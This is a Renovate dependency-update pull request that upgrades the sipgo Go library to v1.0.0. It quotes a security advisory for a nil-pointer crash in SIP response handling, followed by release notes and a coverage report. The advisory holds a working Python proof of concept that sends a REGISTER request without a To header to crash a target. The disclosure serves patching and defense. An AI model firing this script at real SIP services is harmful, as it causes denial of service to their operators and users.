Update module github.com/emiago/sipgo to v1 [SECURITY]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/emiago/sipgo	v0.33.0 -> v1.0.0

GitHub Vulnerability Alerts

CVE-2025-68274

Description

A nil pointer dereference vulnerability was discovered in the SIPGO library's NewResponseFromRequest function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.

The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.

Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the NewResponseFromRequest function.

Technical details

The vulnerability is located in /sip/response.go at line 242 in the NewResponseFromRequest function:

if _, ok := res.To().Params["tag"]; !ok {
    uuid, _ := uuid.NewRandom()
    res.to.Params["tag"] = uuid.String()
}

Root Cause:

1. Missing To Header: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.

2. Header Copying Logic: During response creation in NewResponseFromRequest, the code attempts to copy headers from the request to the response. Since there's no To header in the request, no To header is copied to the response.

3. Unsafe Assumption: The response creation code assumes the To header exists and calls res.To().Params["tag"] without checking if res.To() returns nil, causing a nil pointer dereference.

Stack Trace:

panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]

goroutine 175 [running]:
github.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})
    /Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394

Impact

This vulnerability affects all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses.

Attack Impact:

• Availability: Complete denial of service - application crashes immediately
• Remote Exploitation: Yes
• Authentication Required: No - vulnerability triggers during initial response generation which does not require authentication

How to reproduce the issue

To reproduce this issue, you need:

1. A SIP application using the vulnerable sipgo library
2. Network access to send SIP messages to the target

Steps:

1. Save the following Python script as sipgo-response-dos.py:

   #!/usr/bin/env python3
   import socket
   import sys
   import time
   import random
   
   def create_malformed_register(target_ip, target_port):
       call_id = f"sipgo-dos-{int(time.time())}"
       tag = f"sipgo-dos-{random.randint(1000, 9999)}"
       branch = f"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}"
       
       # Craft malformed SIP request without To header
       sip_message = (
           f"REGISTER sip:{target_ip}:{target_port} SIP/2.0\r\n"
           f"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\r\n"
           f"From: <sip:attacker@192.168.1.100>;tag={tag}\r\n"
           f"Call-ID: {call_id}\r\n"
           f"CSeq: 1 REGISTER\r\n"
           f"Contact: <sip:attacker@192.168.1.100:5060>\r\n"
           f"Content-Length: 0\r\n"
           f"\r\n"
       )
       return sip_message
   
   if __name__ == "__main__":
       if len(sys.argv) != 3:
           print("Usage: python3 sipgo-response-dos.py <target_ip> <target_port>")
           sys.exit(1)
       
       target_ip = sys.argv[1]
       target_port = int(sys.argv[2])
       
       sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
       payload = create_malformed_register(target_ip, target_port)
       
       print(f"Sending malformed REGISTER to {target_ip}:{target_port}")
       sock.sendto(payload.encode('utf-8'), (target_ip, target_port))
       print("Exploit sent - target should crash immediately")

2. Run the script against a vulnerable sipgo application:

   python3 sipgo-response-dos.py <target_ip> <target_port>

3. Observe that the target application crashes with a SIGSEGV panic.

Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.

---

Release Notes

emiago/sipgo (github.com/emiago/sipgo)

v1.0.0

Compare Source

🚀 SIPgo v1.0.0 is here 🚀

SIPgo had a long journey, and API was challenged with many different projects and used by big names out there. There hasn’t been any significant need for breaking changes lately, so there is pretty high confidence this API will remain stable going forward.

What does 1.0.0 mean?

• A stable and predictable API
• No breaking changes planned in the near future
• It will make more stable API for Diago lib
• More Confidence for production deployments

Future ✈️

There are open things regarding performance and small features that will probably land into 1.0.0 API. To mentioned few

• PR for Parser improvements
• Gracefull shutdown
• Transport more control like deadlines

Lib has opportunity to be more improved but even with current state it excels in performance of handling high loads of traffic.
You can always check proxysip example and running locally with docker-compose sipp stress where on this limited container (4 cores) we can achieve high throughput on modern CPU ~2000rps with no latency impact.

✋ v2
Many Big things or issues that we may not be good fit for current API are moved to v2 Milestone and I would like to see this happening as well.

🙌 Thank You

Huge thanks to everyone who contributed, submitted issues, provided feedback, or used SIPgo as a building block in their own systems.
Your input has shaped the API and helped bring SIPgo to this milestone.

Thank you all for your contributions and for keeping this project alive!

What's Changed

• fix: ParserStream handling StartLine and incomplete Header by @​j-licht in #​255
• fix according RFC3261 12.1 Creation of a Dialog by @​zusrut in #​262

New Contributors

• @​j-licht made their first contribution in #​255
• @​zusrut made their first contribution in #​262

Full Changelog: emiago/sipgo@v0.33.0...v1.0.0

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 0.00%. Comparing base (c924718) to head (e2802dc).
⚠️ Report is 1 commits behind head on master.

Additional details and impacted files

@@          Coverage Diff           @@
##           master    #414   +/-   ##
======================================
  Coverage    0.00%   0.00%           
======================================
  Files          28      28           
  Lines        2922    2922           
======================================
  Misses       2922    2922           

Flag	Coverage Δ
go	0.00% <ø> (ø)

Flags with carried forward coverage won't be shown. Click here to find out more.

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.